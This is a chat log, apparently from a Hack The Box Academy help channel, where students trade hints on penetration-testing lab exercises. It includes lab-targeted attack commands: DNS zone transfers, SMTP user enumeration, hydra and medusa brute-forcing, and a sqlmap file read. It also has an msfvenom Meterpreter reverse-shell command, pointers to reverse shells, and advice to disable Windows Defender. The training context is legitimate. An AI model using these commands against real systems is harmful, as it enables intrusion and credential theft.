without port forwarding?

Anyone?

I used the dev box to compile the binary, ran it and caught a shell from the pwn box. Copied the exe to the pwnbox, terminate the dev box, start the target box and transfer the exe to the directory stated. I don't see why any port forwarding is needed.

how are you encrypting the payload

Anyway I'm gonna re-do it from scratch and try again

AES, like in the example

Had to rm -rf ptunnel-ng and re-clone to fix this. Not sure what was going on.

anyong help me with Intro to Whitebox Pentesting SA2, i keep getting "code injection should not be possible, even without sanitization or validation"

I am currently working on the following question in the Footprinting > SMTP: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer. I thought the following would be it: ||nmap -v -p25 -n --script smtp-enum-users --script-args smtp-enum-users.methods={VRFY} 10.129.42.195|| However, this returns no accounts. I also tried ||smtp-user-enum -U usernames.txt -t 10.129.42.195 -m 150 -M VRFY||, but this too returned no results. Note: usernames.txt contains the same contents as the given file

Don't know what -m does

But you might wanna increase the wait time to 20+ seconds

It's because your scanning is too fast

You may also need to attach the inlanefreight.htb domain

-m adds a max number of processes. I removed that, and tried adding a wait time of 20s. I'll see what happens.

Yep, an increased wait time ended up working. Why would an enumeration going too fast result in a no positive results? Does it just not have time to establish a connection, and so it times out?

SMTP is a slow thing

I see. How likely am I to run into this problem with other protocols? Not very likely, I take it?

It depends

Well, just one more thing to consider I guess

Hey currently stuck on this one any help for how to progress for the final skill assessment? I've got to the /SECRET/secret.xxx part and not sure how to progress.

You'll learn tiny quirks of each protocol as you go

The page tells you what paramatername to fuzz values for

I did see that

So...

I don't understand how to utilize that info

Recall the parameter fuzzing section

will review it

I suggest taking notes as you go

yeah really seeing the value in that now

The more you do it the less you'll need to rely on them

But they're definitely good for "wait what was the thing again?"

I might as well ask my other question. I am working on Footprinting > DNS: What is the FQDN of the host where the last octet ends with "x.x.x.203"?. I have done the following:

1. ||dig axfr inlanefreight.htb @10.129.42.195||
2. ||dig axfr internal.inlanefreight.htb @10.129.42.195||
3. ||dnsenum --dnsserver 10.129.42.195--enum -p 0 -s 0 -o subdomains.txt -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt internal.inlanefreight.htb||

However, I am getting the error that there are no nameservers. ||I have tried all different lists (as the hint says)||

Do I have to enable the ZAP HUD? I don't see it in the in-built browser

Yeah, but you can easily use burp for this

Subdomains of subdomains

For which? :-)

To answer the questions

You'll need to do things slightly differently

Figured it would be good to learn ZAP since it has the auto scan feature (for exam)

¯_(ツ)_/¯

Ah yeah already did so for one question :) Do you prefer burp community over zap?

I used burp more but can't say I really needed the spidering feature

Also burp does cache the http requests made while it's running

Proxy > http history

It seems that the transfer fails for all other subdomains, which makes me think that it is definitaly a subdomain of ||internal||. However, all of the subdomains of that subdomain fail anyway... That is the main problem I was running into earlier

It's not

Your logic is backwards

You want to attack subdomains you cant natively transfer to

Dnsenum is a bruteforce tool

So they would not appear in that list I was testing against?

You don't need to bruteforce what you can already access

That would make sense

One of the other subdomains from your base axfr is the way forward

But your list is in-fact wrong

You'll need a more fierce list as well

can I DM you the command I'm trying to see if I'm far off?

Hey, so i am working on What's the contents of table flag5? (Case #5) - Attack Tuning SQL MAP Essentials. I was initially using my kali and sqlmap keeps timing out. But when I use the same command on pwnbox, it works without a hitch.

Can someone please help me figure this out?

Poor Internet? Try using tcp instead of udp for the VPN connection.

i am using tcp vpn and my internet is working fine :/

I have been able to find ||ns.dev.inlanefreight.htb||. I ran ||dig ns/axfr/any/soa ns.dev.inlanefreight.htb @10.129.42.195||, however, none of these helped.

I've tried fuzzing the parameter like this but it doesn't seem to get me anywhere. ||ffuf -u http://IP:PORT/admin/panel.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "accessID=FUZZ" -w common.txt -v||

I may have just figured it out...

Pivoting, Tunneling, and Port Forwarding > RDP and SOCKS Tunneling with SocksOverRDP

Why is this happening and what Windows Defender setting must I change on the target to ensure that this actually runs and doesn't throw an error like this? Anyone? @fathom pendant?

Can't spawn a pwnbox for like 2 days anymore. Do you guys have problems too or is it a skill issue?

I can spawn a pwnbox whenever I want for as long as I want, but that may be because I am on a business plan

@foggy monolith please reduce the usage of markdown syntax when specifying the module and section names

i'm on plat sub

The file .dll is probably deleted by Windows Defender

And again, how do I prevent that?

you can stop defender

Thank you very much indeed

Disable real time protection, Google can help

my recent attempt ||wenum -w common.txt --hc 200 -u "http://IP:PORT/admin/panel.php?accessID=FUZZ"|| also doesn't appear to show anything

I feel like I have all the right pieces I just don't know how to put it together

will try again later thanks for the help thus far

I mean I'd use ffuf or gobuster instead

I'm struggling to interpret a Question from "Filter Contents - Linux Fundamentals"
"Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer."

i don't know if the Q is talking about like URL links containing "inlanefreight" or something else, but i've tried using:
curl https://www.inlanefreight.com | grep -o www.inlanefreight.com.*\" | sort | uniq | wc -l
to no avail,

This is the only bullshit one in the module as it requires some html knowledge

lol i know some html from high school, they were talking about urls right?

#modules message

When you curl a website you're generally gonna get it's source code

module: attack common service - RDP

[12:44:10:387] [66982:000105a7] [ERROR][com.freerdp.core.rdp] - [rdp_recv_callback_int][0x55c6cdd6c4d0]: CONNECTION_STATE_NLA status STATE_RUN_FAILED [-1] [12:44:10:387] [66982:000105a7] [ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]

I got username and password from ***.xml file in windows but i cann't connect to machine via RDP, getting error

The link I shared explains it much better

I don't recall an xml file playing a role in the rdp auth but it's been a minute

what error?

Yeah tbh idk what xml file you're looking at as credentials are directly tied to the first question

Error:
[ERROR][com.freerdp.core.transport] - [transport_check_fds]: transport_check_fds: transport->ReceiveCallback() - STATE_RUN_FAILED [-1]

Is there any method of connecting to RDP rather than username and password????????????

is this the last question on the section?

yup

did u enable restricted admin?

i got in just fine

u probably need to restart

yes, i did it using HTB credential given in the module

yeah try restarting the machine

Did you use the /pth: option for using the admin hash?

I do not have hash instead username and pass

?

Don't know where you got that from

Check the desktop of htb-student

U didn’t click on the notes?

The file referred to by the first question

nope, i enumerated it (credential harvested)

Well it's likely wrong

:)

feeling same

How did u miss the desktop then

There was no need at all to credential harvest

Especially a file called directly out by a question

hit me again!

First question of the section my guy

Can't be any clearer than that to look at

Also just in case try resetting your vm

The error your getting isn't necessarily a log on error indicating bad creds

I got initial foot hold and do not have admin priv, any hint?

...

My brother in christ

https://academy.hackthebox.com/module/116/section/1171 this section yes?

Open the file referenced by Question 1

Since you can't seem to understand anything beyond "do this"

ohh, i never thought of that

i do

It's literally what me and @safe star Have been saying the past x minutes

I see a file titled that, I'm gonna click it, even if it's out of frustration of trying everything else

This module is about the basics of services, not credential harvesting or any of that

Everything is generally given in a fairly straightforward way

got it

Or just follow what the section says for the most part

If it doesn't come up in the section, it may come up in the skill assessments

Didn’t password attacks go over it too?

Why? What exactly is confusing you?

Nvm it’s all sorted now

I was confused on why the 302 aren’t shown on browser

And only shown on the burp

it takes time to build mindset

Indeed

So don't try and think outside the box

Always start with simple first

Like stuff on the desktop

sure, I appreciate you

The biggest and most important thing is not discounting the simple solution to the problem given

And sometimes even asking: did the question ask me to, or did the module/section go over this

@uncut ocean u get it?

tried the defender off

but still it gets deleted

i just copied and pasted it on to the desktop then disabled it

did you run cmd as admin?

can i skip Pivoting, Tunneling, and Port Forwarding
if i know how to use ligolo-ng ?

still good to go over the module and see other methods

even if you're familiar with the subject

still deleted

dm a pic

no bro its on of the best modules it will give you idea how actually things works in background

Note to current and future students of HTTP Attacks: just solved the HTTP Response Splitting Question. If anyone in the future might need a nudge, feel free DM me. As someone stated before, I too struggled with Firefox and used Chromium instead. Then, pay attention to the Hint provided by HTB..

Any nudge on how to get the second flag(on SQL01) on the Using Crackmapexec Skill assestment lab exercise?

Is Real Time protection turned off ?

roast

Already done and found "A**l". I see no special permission in the MSSQL, so I guess ntlmrelayx?

Good day

Completed half of shells and payloads

check shares

Could have finished more but meh

I don't see anything strange on SQL01, the only share I see readable is the on DC01

Footprint - DNS

Q1. Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain

How to find FQDN?

1. I tried this command.
   ||dig PTR inlanefreight.htb @10.x.x.x||
   ||dig A inlanefreight.htb @10.x.x.x||

2. Next, tried this command.
   ||dig axfr inlanefreight.htb @10.x.x.x||

3. Finally, found the result. but i don't understand why ||ns.inlanefreight.htb.|| can be an answer. why below can't be an answer?
   ||root.inlanefreight.htb.||
   ||inlanefreight.htb.||

Thanks.

there's a share containing a lot of things you can access

Thanks! My bad I was blinded by all the files LOL 😄

yeah time to dig through them

because the question is asking for the DNS' FQDN

Attacking Common Applications - WordPress - Discovery & Enumeration
Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).

I found :
=== Mail Masta ===
=== Contact Form 7 ===

└─$ curl -s http://blog.inlanefreight.local/ | grep plugins
<link rel='stylesheet' id='contact-form-7-css' href='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/subscriber.js?ver=5.8' id='subscriber-js-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine-en.js?ver=5.8' id='validation-engine-en-js'></script>
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/jquery.validationEngine.js?ver=5.8' id='validation-engine-js'></script>
<link rel='stylesheet' id='mm_frontend-css' href='http://blog.inlanefreight.local/wp-content/plugins/mail-masta/lib/css/mm_frontend.css?ver=5.8' type='text/css' media='all' />
<script type='text/javascript' src='http://blog.inlanefreight.local/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.4.2' id='contact-form-7-js'></script>

but incorrect

can anyone help me pls

OMG.. my english issue 😦 thanks

guys....

Have you performed a wpScan?

yes I found the same plugins

||[+] mail-masta||
||[+] contact-form-7||

Wpscan won’t find it

Try curling more pages

I curled index page so now Should I look for another one?

Use whatever tool you like, but always look at all pages.

.....

thanks

then how can i find
Find the version number of this plugin. (i.e., 4.5.2)

I looked all plugins readme.txt files but there is no

Readme files are usually capitalized

it doesnt matter there has information but not for 4.5.2

Have u looked through the file?

yes

The change log?

no only readme.txt

Yes change log in the readme

did you mean log.txt ?

No it should be in the readme

bro I said I already read all readme.txt files

Wyd all?

I mean all plugin's reame

Did u find the plugin then type the name in the plugin directory?

yes I did

Send a pic in dm

vHosts needed for these questions: inlanefreight.htb + 1 Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"-------------------------------
Have added host to etc/hosts
gobuster vhost -u http://inlanefreight.htb -w subdomains-top1million-110000.txt --append-domain

Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://inlanefreight.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true

Starting gobuster in VHOST enumeration mode

Error: error on running gobuster: unable to connect to http://inlanefreight.htb/: Get "http://inlanefreight.htb/": dial tcp 94.237.53.113:80: connect: connection refused
I get this error how to proccedd

This is the host added in etc/hosts file

you need to set a port

to the hosts file??

to your gobuster command

Should add the port number of our target ryt ?

Yes

In the ad skill assessment

1. How to get reverse shell from webshell. I tried revshell. Not working. Causing errors

Is there anyone else facing challenge with https://academy.hackthebox.com/module/280/section/3130

Recursively fuzz the "recursive_fuzz" path on the target system (ie http://IP:PORT/recursive_fuzz/) to find the flag.

like it never reaches the end for me

i liked this module but at same time i'm hating it

it just eating so much time "i just don't know if its for good reason or not".

can someone help here?

https://tenor.com/thcfxHAYiy0.gif

like what type of vuln is it?

upload ?

I'm having some trouble with the LFI Skill Assessment in the last step....

Can I DM someone?

which mod?

File Inclusion

dm me

which part

Yeah its file upload. Web shell is already in the assessment. Iam just trying to get reverse shell to get started.

Skill Assessment

@hexed lintel bro calling you in dm

connected to vpn or pwnbox?

@strange forge which module and section?

Ad enumeration and attacks skill assessment 1

can you dm the question?

use the webshell like a regular shell, grab one from revshells.com

or drop here

it's not a question, they just want to get a revshell from the webshell

@strange forge try base64 reverse shell

Powershell#3 Base64

It didn't take forever for me. You can DM what tool and command you are using.

Thanks brother

Hi there, could someone help clarify this question: "If csrf.htb.net was using SSL encryption, would an attacker still be able to alter Julie Rogers' profile through a CSRF attack?" [Session Security / Cross-Site Request Forgery (GET-based)]. In the scenario presented, where the HTTP host is used, the attacker successfully captured user csrf token by sniffing the local network traffic. I'm struggling to understand how the correct answer can be ||true||, given that with SSL encryption enabled, the attacker shouldn't be able to capture CSRF token and eventually craft form to send a valid request to the API.

it's bit lengthy you want it here?

working the bbh -> sesession attacks module. HBU?

this is trying to have you discern HTTP vs HTTPs.

HTTP is delivered over application layer, while a subsequent (secured) connection over SSL is handled on transport layer. The browser still renders/stores the cookies/data (mentioend in the previous sections)

i was just pondering this the other day (how a stateless protoc like HTTP deals with stateful connections like SSL/TCP), chat gpt was /somewhat/ helpful to break this down, does that make sense or do you need a more in depth explanation? @covert vortex

got it, thanks mate : )

its like the transaction occurs encrypted. not the end result? my understanding is still very precarious so barring an answer from someone who is more aware of whats going on, i think that will suffice for a basic understanding

there's a uh, module somewheres about wireshark where they have you setup a (TLS?) cert to sniff traffic between http/s connections that may help solidify the actual transmission parts of this concept. sorry i dont have a link but im 99% sure its the wireshark module on academy

like if you sniff your own https traffic its encrypted but if you set up a cert (and a key or something?) you can see whats going on, not that thats specifically helpful here but it may round out the concept

Also while we're on this topic, you have a clear differentiation between XSS/CSRF vector right? this comes up in interview questions... CSRF requires user interaction, XSS requries no user interaction (and poses a much deeper threat in terms of what can be done leveraging xss). If you're ever asked "whats the core diff between xss/csrf"

or something like that

Hey im doing the thick client app attacking from attacking common application here i disabled the auto deletion and checked the temp folder for a batch filr but im not seeing anything inside it

try searching this channel, i think this has came up a few times and has been answered. I dont have access to that module so I cannot be of help. Theres 2-3 other users who get active around this time though who I've seen help on this module, they should be around shortly.

This may help a bit:
https://forum.hackthebox.com/t/exploiting-web-vulnerabilities-in-thick-client-applications/276823/37

See i dont get any bat file when i restart the service after disabling that auto deltion

I dont see anyone properly addressing this issue in the forum

Above

did u search the channel from discord? lots of results youll need to browse them

I am doing "Skill Assessment" section of "Command Injection" module. I have found the point of injection but no matter what payload I use, I am getting "Malicious request denied".

I have tried
bypassing space filter,
bypassing blacklisted command using
character insertion,
command reverse,
case manipulation,
bas64 encoding,
hex encoding,
tried reverse and hex encoding together in the payload.

But nothing seems to work. All I get is `Malicious request denied".

It did mention this issue im facing but soutions isnt given there they moved onto a different problem

Yeah im seeing lots of complaints, T_T'' sorry theres no help there.

ok i think you need to try bypass + bypass (at some point)... and check your error messages carefully they change depending on which bypass method you use. If you have no single bypass working yet, go down the list from start to end of every bypass you tried in the module, and check your errors. For example one error message might say invalid extension while another says malicious... use ffuf or whatever to filter your output, burp (community edition) wont let you do this (easily)

Will try this. Thanks

How do I get started with hacking?

@small plover this is not the place for this

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

#modules message

Thank you

Any help

.

Hey guys, iam not able to perform zone transfer can someone guide me stuck for a long time ^^ : After performing a zone transfer for the domain inlanefreight.htb on the target system, how many DNS records are retrieved from the target system's name server? Provide your answer as an integer, e.g, 123.

what cmd are you using to perform a zone transfer?

dig axfr @a.root-servers.net inlanefreight.htb

and your output?

you have the ip added to hosts right?

i think your @... might be wrong though

dig inlanefreight.htb and double check the dns server found in the results, or nslookup or w/e

its like we should add it name server ryt or am I wrong ??

no dont add the NS to /etc/hosts (if im not mistaken) but target it directly in your AXFR

Link to the section?

Ok let me try

dig axfr @a.root-servers.net 10.129.25.127

; <<>> DiG 9.20.0-Debian <<>> axfr @a.root-servers.net 10.129.25.127
; (2 servers found)
;; global options: +cmd
; Transfer failed.
:<

https://academy.hackthebox.com/module/113/section/2139

i believe your @DNS is targeting a public NS and we need to target a private dns to the target, as its a box that does not reach the internet

now what @DNS should I use
dig 10.129.25.127 NS

; <<>> DiG 9.20.0-Debian <<>> 10.129.25.127 NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 64464
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1410
;; QUESTION SECTION:
;10.129.25.127. IN NS

;; AUTHORITY SECTION:
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400

;; Query time: 29 msec
;; SERVER: 10.255.255.254#53(10.255.255.254) (UDP)
;; WHEN: Thu Sep 19 18:59:06 IST 2024
;; MSG SIZE rcvd: 117

what does your /etc/hosts file look like and also what does nslookup for inlanefreight.htb return? (after verifying that its correctly added to your hosts file)

@surreal heron ^

also give me a link to the section so i can review what i did there, please

https://academy.hackthebox.com/module/144/section/1255

nslookup inlanefreight.htb
Server: 10.255.255.254
Address: 10.255.255.254#53

** server can't find inlanefreight.htb: NXDOMAIN

Go over the steps again, make sure you're removing the delete rights correctly.

@quiet trout

thx, yeah for a sanity check remove the public DNS server a-root... and go with inlanefreight's IP address instead, see what happens

That i am doing properly

That too i tried let me show you

dig axfr @10.129.25.127 inlanefreight.htb
;; Connection to 10.129.25.127#53(10.129.25.127) for inlanefreight.htb failed: timed out.
;; no servers could be reached

;; Connection to 10.129.25.127#53(10.129.25.127) for inlanefreight.htb failed: timed out.
;; no servers could be reached

doing attack FTP from Attacking Common Services for some reason running medusa to bruteforce didn't work this the command i ran "medusa -U users.list -P passwords.list -h 10.129.203.6 -M ftp -n 2121 "

ok leave the @... part off entirely, what do you get?

dig axfr 10.129.25.127 inlanefreight.htb

; <<>> DiG 9.20.0-Debian <<>> axfr 10.129.25.127 inlanefreight.htb
;; global options: +cmd
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400
; Transfer failed.
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400
; Transfer failed.

dig axfr inlanefreight.htb

; <<>> DiG 9.20.0-Debian <<>> axfr inlanefreight.htb
;; global options: +cmd
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2024091900 1800 900 604800 86400
; Transfer failed.

When im on starting module the target machine is stuck on "target is spawning", so I cant see the IP. I didint click on it to start, its been that since last session when I was logged in to academy

Refreshing the page doesn't solve the issue? I sometimes have this when I don't kill the instance at the end of a module

But usually refreshing the page gets things back to normal

Nope, its the same if i refresh, or well, it loads and auto starts (going to spawning machine) again

spawning target

@quiet trout

I would contact support then

Thanks 🙂

are you connecting to the target from a pwnbox? reset target perhaps?

im not sure why you're having this trouble.

spawn one in another section or switch vpn server

It worked, what would i do without you, my hacker daddy? 😄 @next bronze

Tried both reseting for 2 time dont know what the issue is

Does the double pivoting don't work with ligolo in Pivoting Module -> Skill Assessment section? I've tried many things and was able to setup a file server by which I can directly transfer files from my Attack host to ||172.16.5.35|| windows host. But when I try the same for double pivoting it throws an error as: ERRO[0140] read tcp 127.0.0.1:53490->127.0.0.1:11601: use of closed network connection 2024/09/19 09:33:02 [ERR] yamux: Failed to write header: EOF

ok make sure your IP matches the new target IP in your /etc/hosts file, but you're cmd looks right (either specifiy the target IP in your @.. or leave it blank, try both you /should/ get results either way... just to rule out the public dns issue you were running into earlier

ok brother thanks

it does but this can happen if you have a bad connection

or your connection is unstable

but my connection is pretty stable. I tried resetting it multiple times as well but still didn't work.

try with the latest stable build of ligolo

I struggled the same way when I did it 2 days ago with ligolo... Ended up doing the second pivot with netsh.
Too bad because ligolo is super user friendly and easy to use

I was using 0.7.2 alpha something are you referring to the same?

If it's alpha it's not stable

I've been using 0.6.2

hey can anyone tell me how to handle when you either a) accidentally run the wrong cmd on a nc listener and redo it only to get target port in use (and lsof -i :9001 returns nothing) or b) when you occupy a common port like 8080, terminate the listener then need ot run burp and its occupied (and is still not listed in your lsof...) ... i run into this every so often and i have to reset the box to solve this... its frustrating.

Last stable is 0.6.2 indeed

I'll try with one too

See i dont get any bat file when i restart the service after disabling that auto deltion in attacking thick clietn apps section

Hello everyone I am a first-year student, and I have a difficult choice: I want to become a pentester, or rather, a specialist in reverse engineering or web pentest, but the training, of course, will be very difficult, and I want to first study to be a DevOps engineer, then work for DevOps and eventually switch to pentest. What would you recommend to do?

1 thing i learned go where the heart takes its your choice not ours

work is fun as long as you make it fun

not after that

i think DevOps experience will help with securing an IT job, but this would be better discussed in #careers-and-certs

Any idea what the second IP is for?

if you don't have access to the channel, please verify your account by following the instructions in #welcome

you're young enough that if you put in the effort you can try them all, get your ducks in a row then work a year doing this and a year doing that and see what you like

youll never really know unless you put time into trying it

must be related to module

No wonder Sherlock !

prob a DC and a host on the domain

or two DCs perhaps

or a DC and a DNS/DHCP server, you'll need to connect and see

Cant connect though get the log in prompt and the pass isnt valid

explore and take a sip of every drink and find which you liked the most in serial you have time to explore so take your time

xfreerdp? try a vnc instead?

oh i see you're using xrdp, unfamiliar with that one you should try xfreerdp

your user name may not be FQDN, being rejected by login prompt. xfreerdp ful full syntax should resolve this as a sanity check

xfreerdp i am using

Thank you all for giving me the advice💚

Just to hack something, you need to know how it works and I thought that DevOps would be a great option, I would know how databases and SQL work, etc

I disagree

There is a problem in the module ATTACKING COMMON SERVICE, section ATTACKING EMAIL SERVICE, i am doing the right command but it's not working anymore, it worked once on pwbox and never on my vm , any hint ? The command is smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t <ip adress> also to crack the password it's not working... hydra -l m*****@inlanefreight.htb -P password.list -f <ip adress> smtp

Are you connected to vpn right?

I am

What isnt working the user enum or hydra?

Both

user enum worked once

What error does each one print ?

None, it's just saying nothing was found...

Ping to the ip does it work?

But the user enum worked once and i changed nothing soo

Ping does work

it take time

It says it doesn't find anything

No...

It goes to the end

Try enumerating users with other tool

ok

I ll try what you said

you are enumerating the user right?

Yes, i want to find the username

dang it i droped the spoiler

I find it since the command worked once

insted of RCPT try use VRFY

you are working on footprinting module?

No, i am on the attack common services, email section

With what?

did it work on your side ?

yes

it did

Hey could someone help me out with the attacking thick client applications section in attacking common services module

I have disabled the auto deletion of files in the temp folder and again run the .exe file in that section and checked the temp file for the mentioned bat file that was supposed to be in the temp file now since that have turned off the auto deletion part but i dont see that bat file in the temp file

The hydra too ?

got the user?

Yes

try hydra with that.

looks like it's working again, gonna try to hydra

everything is working just fine, they did something or maybe it was lagging but i didn't change anything in what i typed

Thanks for the help ❤️

lovely

Did i miss something? We have macOS modules now?

It's already been there.

Didnt see that before, lol

smtp is a slow service

Been there for ages

It requires having access to a MAC

thats why i said it takes time

Really?

...yes

It's kinda hard and less than legal/easy to emulate a Mac

The MacOS isn't really available

And if you do find it, you'd need an ARM chip

Yeah, I remember downloading mac os iso and trying as a VM and really had a bad time lol.

Yeah

A lot of Apple stuff is proprietary so...

Understandable

Hi HTB Folks. I am working on the Whitebox Attacks - Type juggling assessment and I could really use a nudge. Anybody on who might be able to help?

https://dontasktoask.com

In the Whitebox Attacks - Type juggling assessment am I supposed to stick to the Sha256 magic hashes and am I correct that the username has to include 'admin' in it, but it cant be at the beginning? I've been working on this for 3 days and I am not sure what else to try

Any help

haven't pulled enough money to unlock this module same for mac one

sorry

can someone give me hand to run one command and give me the result of it?

#rules keep it legal

Anyone have trouble spawning targets

That would be illegal

Any one knws why the bat file isnt shown here

This is from the thick client attacking in attacking common services

did anyone here faced problems setting/downloading sliver?

Go through the steps to make sure you're setting permissions correctly. I just did this seconds ago to confirm.

Ivde been doing this

From yestrday no idea what im missing

All I used were the steps in the module

Mm

sdfadfasfdosajfopaejfioewjpfoiewjewfpoiqwjefopwjoiwjfeiqw

I thought i disabled the auto delete stuff but i dont knw if its still deleting

Bless you

You just need to disable the delete perms for your user

Did your keyboard have a stroke? 😅

I did

Thats whats troubling i did many times but still i think the bat file is getting deleted

hi cat

then you didn't disable it properly after turning off inheritance

I disabled it clicked on edit on cybervaca and turned the tick off on

If you did it correctly the bat file will be exactly where is says it will be

Clicked ok apply ok and then again run the exe

But i did get this error

Hit continue

Some things you can't apply it to

Since you're basically trying to cascade the permissions

I am working on the sqlmap section Q: What's the contents of table flag4? (Case #4). This one wants to use JSON but I am not sure how to copy the request as JSON?

The module should show you how to copy the request

Yes I can copy as curl but not as JSON.

Ya after all this i ran the exe but still the bat file is geting deleted i think

Did you hit continue until no more errors?

Yup

For the Sliver C2 module, I'm running into issues with generating a stager on my local attack box which works on Pwnbox when repro'd.

The following command times out with this error:

sliver > generate stager --lhost 10.10.X.X --lport 8443 --format csharp

[!] Error: rpc error: code = Unknown desc = exit status 1 - Please make sure Metasploit framework >= v6.2 is installed and msfvenom/msfconsole are in your PATH

However, running the equivalent msfvenom command directly will generate shellcode

## Command
$ msfvenom --platform windows --arch x64 --format csharp --payload windows/x64/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=8443 EXITFUNC=thread

## Environment
$ msfconsole -V
Framework Version: 6.4.20-dev

$ which msfconsole  
/usr/bin/msfconsole

$ which msfvenom  
/usr/bin/msfvenom

$ which sliver
/usr/local/bin/sliver

$ sudo systemctl status sliver
Active: active (running)
CGroup: /system.slice/sliver.service
        └─<PID> /root/sliver-server daemon

For further context, I installed sliver with the provided one-liner & reinstalled metasploit-framework via apt. Anyone with troubleshooting advice or experience with this one? Also if needed, I can repost this on #1024429874246590575 for futher outreach. Thanks!

sigh when you copy the request (not as curl or anything) it also copies the data type, like json

Still no bat file in the folder

¯_(ツ)_/¯

i didn't have any issues with it

Im having i dont knw why the temp file is getting

Delted for me

i'm assuming you're going to the user's temp folder and not C:\temp

:)

and disabling the permissions there

I was going to c users cybervaca appdata local temp

And disabled perimisons there

In temp

The file you're looking for may not be under \2

Look through the other folders

Yaa

I dont have anything inside 2 justched file and hyperfdata cybervaca file nothing else however outside in the temp folder i got all thees files

Dude

The d52e.bat...

Check that

The batch file name is random each time it's ran

@granite slate Same issue happening to me since yesterday 😪

How did u check the contents of bat file

Right-click > edit or in powershell cat [file].bat

Yaa

The important bit is towards the bottom

That's the top, sir

Yes

I said towards the bottom

Got the bottom delted it and saved

... why did you delete it?

I forget if that's a step

Ya ut was a step

But was it a step to delete everything

The code was delteinh a service exe

So i removed that part and saved it l

Or just the parts removing the additional files

:)

Reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

Does anyone know how I can list the contents of a directory? sqlmap http://ip:port/dashboard/dashboard.php --data "search=a" --batch --level 2 --risk 2 --random-agent --cookie="PHPSESSID=pj3po8630q4ohs78mo1ma3cfv6" --file-read "/root/flag.txt" --output-dir "/tmp/memehp3"

The step in the reading stated modifying the batch file to only remove the parts regarding deleting files

What module and section is this for?

SQLMap Essentials skill assesment

i cant get web shell for the permissions for the current db user

i just almost got it but dont know how spot where the flag is

Why do you need to read a file? That's not what the skill assessment is asking for

lol

Also are you sure that's where you're meant to be injecting?

the sqlmap essentials module SA is asking you to get the contents of the table final_flag ¯_(ツ)_/¯

No idea why you need a shell or anything for it

Yes, you are right, well seen for some reason it was in the skill assessment of another module xd

¯_(ツ)_/¯

This is why you only focus on one module at a time

Marcie, did you use codecademy before?

probably breifly

Ah okay. I am thinking about following a python course lol

@fathom pendant i still having the same question but for:
SQL Injection Fundamentals

Skills Assessment - SQL Injection Fundamentals

Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

Hi, I have a question about Windows Lateral Movement - Skill Assessment. I cannot enumerate internal network. I'm using proxychains + nmap and don't get any open ports... I did try some powershell scripts for it but it will take ages until done. Can you give some hint? What techniques did you use to find hosts and open port in internal network?

Root directory of filesystem != /root

sqlmap by itself search for common root directories like /var/www/html

Well you said you have a working webshell

And sqli fundamentals doesn't require sqlmap to complete

im trying get one

Recall the steps in one of the module sections

Also you don't need something fancy just a basic php shell will get the job done

Hey i try to run powershell cmd but powershell doesnt load anytime

Pwershell.exe

Run as admin

There's some gpo that doesn't allow it to be run as regular user

That too crashes

Once it opens it closes then itseld

""#poetry install
Installing dependencies from lock file

Package operations: 112 installs, 2 updates, 0 removals

`` • Updating pip (23.0.1 -> 23.2.1): Failed

Error

g-io-error-quark: The connection is closed (18)

at /usr/lib/python3/dist-packages/keyring/backends/libsecret.py:134 in get_credential
130│ Otherwise, it will return the first username and password combo that it finds.
131│ """
132│ query = self._query(service, username)
133│ try:
→ 134│ items = Secret.password_search_sync(
135│ self.schema, query, Secret.SearchFlags.UNLOCK, None
136│ )
137│ except GLib.Error as error:
138│ quark = GLib.quark_try_string('g-io-error-quark')“ "

why do i get error installing poetry

the problem with using --batch the cookies of a non authorized user was taken by sqlmap and merged there just solved manually telling for no to do that

